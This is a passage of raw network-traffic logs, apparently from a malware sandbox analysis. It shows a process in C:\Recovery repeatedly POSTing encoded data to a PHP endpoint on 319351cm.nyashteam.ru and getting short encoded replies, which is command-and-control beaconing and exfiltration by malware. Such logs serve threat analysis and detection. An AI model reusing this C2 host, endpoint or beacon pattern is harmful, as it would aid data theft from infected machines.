cfL4;desc="?proto=TCP&rtt=3844&min_rtt=1735&rtt_var=4868&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1305&delivery_rate=78465&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.6	50013	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:47.656213999 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:48.017793894 CET	1012	OUT	Data Raw: 56 5f 5a 59 59 5a 53 5b 5c 56 52 5a 50 5f 5a 5c 58 59 5b 59 50 5f 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: V_ZYYZS[\VRZP_Z\XY[YP_V\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>V1)3<1&230;:)3Z ?1%\8!^'S/-']/!Q!4
Dec 6, 2024 03:13:48.740933895 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:48.989597082 CET	803	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2zseOQtGiD4P%2BjSvMsHE1lgVzdr5cbk5pAObwY81jRvDW0Fk%2FMH7AF2YHPa%2Fwzd9blJPpUSSZugMBLalJZ7GyBx3TVIaMJIgnLAslX3BwtD58bxuDaYTWzeAEJbsBmp5VkBvSV2H9T4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c242a9f9de98-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3076&min_rtt=1666&rtt_var=3446&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=112715&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U
Dec 6, 2024 03:13:49.181590080 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.6	50019	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:49.433383942 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:49.779990911 CET	1012	OUT	Data Raw: 56 54 5a 5e 59 50 53 59 5c 56 52 5a 50 59 5a 55 58 5e 5b 5f 50 5b 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VTZ^YPSY\VRZPYZUX^[_P[V[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"A*0>?#^&+-2%(>).34>&93!4,=']/!Q!,
Dec 6, 2024 03:13:50.520114899 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:50.791306019 CET	805	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ffLOIBygJMpSw0IRonvt%2FIiIj9vCKCVbS3VSqQWdnVSnMbkMdDCg7Po2jvXT9Hn0ik2uMx3UyZib6NYkM23NpIazfhl9JzxkAMujsv91QE6BkdV0rDZBRNOoy9mhXKzGyVYDbPT%2FoA8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c24dcbddc475-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3551&min_rtt=1717&rtt_var=4312&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=89078&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.6	50023	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:51.044312954 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:51.389288902 CET	1012	OUT	Data Raw: 56 55 5a 5d 59 5b 53 5b 5c 56 52 5a 50 52 5a 57 58 5a 5b 5c 50 5e 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VUZ]Y[S[\VRZPRZWXZ[\P^VXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!!]=T'<%+Z';R2<'"^(=##/%,5;-']/!Q!
Dec 6, 2024 03:13:52.129776001 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:52.386081934 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MzqgbSRCb4ssf88c51%2FKvU89CfRMAvTSUCV9WXsQC647V8Kpcw9O%2F1fD3s9foDd4GYew9VkDcrO0c2kSdVdlqEYjBPSXf20m9TLpWO4ec9uAJ8q5ckqHida9h3bTD%2BH%2BMXgmEpNmJaA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c257d97c42d2-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3340&min_rtt=1708&rtt_var=3905&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=98875&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.6	50029	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:52.640714884 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:13:52.999010086 CET	1012	OUT	Data Raw: 56 52 5f 5d 59 59 53 5c 5c 56 52 5a 50 5f 5a 57 58 5b 5b 57 50 55 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VR_]YYS\\VRZP_ZWX[[WPUV^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!) 9Z=3>% %&?082>=#X7Y-R%:'X"?U/']/!Q!4
Dec 6, 2024 03:13:53.733681917 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:53.969609022 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pIwsL1T4aqG9LzPWlTrFy6yQgIoLmdL8FB4LVZHgkAL6QjkG8USM1FG9AA%2FqIEq%2Bf6HpDw88qlQ5SCEpFV9gswqlObNWZe267YvAMveIIn7e8KeODdJMYc9oQ3gEcu%2BWgXALnttgShw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c261da9a4315-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4689&min_rtt=2365&rtt_var=5536&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=69653&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.6	50033	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:54.218079090 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.6	50035	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:54.434077024 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:54.781774998 CET	1296	OUT	Data Raw: 56 53 5a 5e 5c 5d 53 5e 5c 56 52 5a 50 53 5a 57 58 5e 5b 5f 50 54 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VSZ^\]S^\VRZPSZWX^[_PTV_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"A>&?2/(&81&Z$$+^=>7Y"2);\!'W/=']/!Q!
Dec 6, 2024 03:13:55.518445969 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:55.794893026 CET	956	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8sVX0XGQnDlqOVxMfbNB6b4eOPROUPr0IZ9AAF9rgSoH8WcqaI%2FlpM%2FCc12zuOypcGS%2BYv7d96zd7f5KZ1emrvlRlIKFgW2Jt0anddkPtuuYv7cYcXkszUs6xdLaeD0HDtGLNuzGi4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c26d094c199d-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3698&min_rtt=1790&rtt_var=4489&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=85575&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 12 27 03 06 5f 35 31 2f 00 2e 00 0e 1e 26 2e 29 5b 39 28 06 16 22 3b 3d 1a 2b 3c 34 1d 33 1a 38 04 28 3c 2d 5a 3c 3f 09 57 29 28 23 5b 00 13 26 15 3d 13 3a 1a 3e 5f 3f 05 31 0a 29 05 3e 08 22 5a 3d 00 2f 56 23 04 0c 04 21 2e 27 0e 26 3e 3f 52 2e 25 3c 5a 29 34 22 51 24 34 21 5e 0e 11 3a 0c 32 1d 25 02 21 38 3f 1c 25 56 38 5a 3f 39 3c 13 33 2f 02 0f 2b 1a 0a 1d 33 31 21 52 24 11 2c 53 31 39 25 01 21 2f 3f 1d 2d 06 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%'_51/.&.)[9(";=+<438(<-Z<?W)(#[&=:>_?1)>"Z=/V#!.'&>?R.%<Z)4"Q$4!^:2%!8?%V8Z?9<3/+31!R$,S19%!/?-#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.6	50037	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:54.557918072 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:54.925563097 CET	1008	OUT	Data Raw: 56 50 5f 5d 59 59 56 5e 5c 56 52 5a 50 5a 5a 53 58 53 5b 59 50 5c 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VP_]YYV^\VRZPZZSXS[YP\VZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"( 9=0(S;]&]1%'$+)=>?X#/2%9,68;-']/!Q!
Dec 6, 2024 03:13:55.643523932 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:55.927419901 CET	821	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etF7w%2F8xjSO5ye%2Bim%2FNOdvuLW6Emf5HJrcIUj8k2yElFHawd%2BjpPpL3tECafaAjxy8%2Fa2F4wljKI2h4LWezkyVCC%2Bhx%2FvJRC%2FvdVGpCM0m2liO%2FujlOhKPVMadUKUWhXToNh%2F7lmovU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c26dce19c484-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3553&min_rtt=1656&rtt_var=4416&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1305&delivery_rate=86713&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.6	50041	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:56.180144072 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:13:56.529961109 CET	1012	OUT	Data Raw: 53 51 5a 59 5c 5f 56 5b 5c 56 52 5a 50 5d 5a 52 58 5e 5b 5f 50 5b 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SQZY\_V[\VRZP]ZRX^[_P[V]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C0])/W+7_285W%?0;.3#)R%:3X6+T,']/!Q!
Dec 6, 2024 03:13:57.266721010 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:57.549660921 CET	811	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wIkCAGVMig0Y1lBEIx2x844zM7UCmNNz51f%2Fosno4v%2BBYeIb2EdGVx%2BQ12TWPtpxW3IIVplG%2BmUdBv8%2BEirfJ1ytFd9l2VE4kOQ4pKMqcrU2NF8wazgVGKp1ChoF0H9NFYMljTlxNA4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c277e9df7293-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4127&min_rtt=2004&rtt_var=4997&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=76890&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.6	50045	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:57.828310966 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:58.189924002 CET	1012	OUT	Data Raw: 53 56 5f 50 59 5f 56 5e 5c 56 52 5a 50 58 5a 50 58 53 5b 5b 50 5c 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SV_PY_V^\VRZPXZPXS[[P\VYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"D*-)?W</1].13V38:Y).Z ,=U')'Y"84,=']/!Q!(
Dec 6, 2024 03:13:59.058499098 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:59.292309999 CET	816	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TRToAM%2Be7zfTisTLG8nqmxl8GL%2FaITumRqZ8qOOdCJs5Ne%2BcPg%2F1u%2FS0dABTHIHf4E49LRHenda1LivhUePLtkG0cX6giZcgscZl5gOzhKKUDfPlUwX9HkeCC10woWhcV9vJ7iW9Q%2F4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2832aa58c84-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=70038&min_rtt=55528&rtt_var=31187&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=26293&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.6	50050	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:59.537801027 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1000 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:59.889858961 CET	1000	OUT	Data Raw: 53 53 5f 5c 59 5a 56 59 5c 56 52 5a 50 5a 5a 54 58 5b 5b 58 50 5b 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SS_\YZVY\VRZPZZTX[[XP[VTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"( =\?1;V+6+Z%]%T2<+W0&[> 7?.&\$"?V,=']/!Q!$
Dec 6, 2024 03:14:00.651032925 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:00.884152889 CET	817	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9StvInAoKHcRMP7mYV1%2BUCONa%2FKQp1UU3Hts9p6eWx%2FDshXb3r8lT7fCb%2FK%2F60w6eam5nCn0yXct3SXzNLXPUy6beNqbIlADJYvK%2Bj66BXIkSxTK2myO4H%2FcpEb0hKbSzE1g5%2FVsRTw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c28d1af080d3-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=5045&min_rtt=1612&rtt_var=7472&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1297&delivery_rate=50201&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.6	50054	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:00.933706045 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:01.280055046 CET	1296	OUT	Data Raw: 56 52 5a 5a 59 5a 53 5c 5c 56 52 5a 50 53 5a 5d 58 5f 5b 5c 50 5d 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VRZZYZS\\VRZPSZ]X_[\P]V]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@>3.1;V<?%&%$3;"_== 7Y-&,"^ ,=']/!Q!
Dec 6, 2024 03:14:02.018362999 CET	25	IN	HTTP/1.1 100 Continue
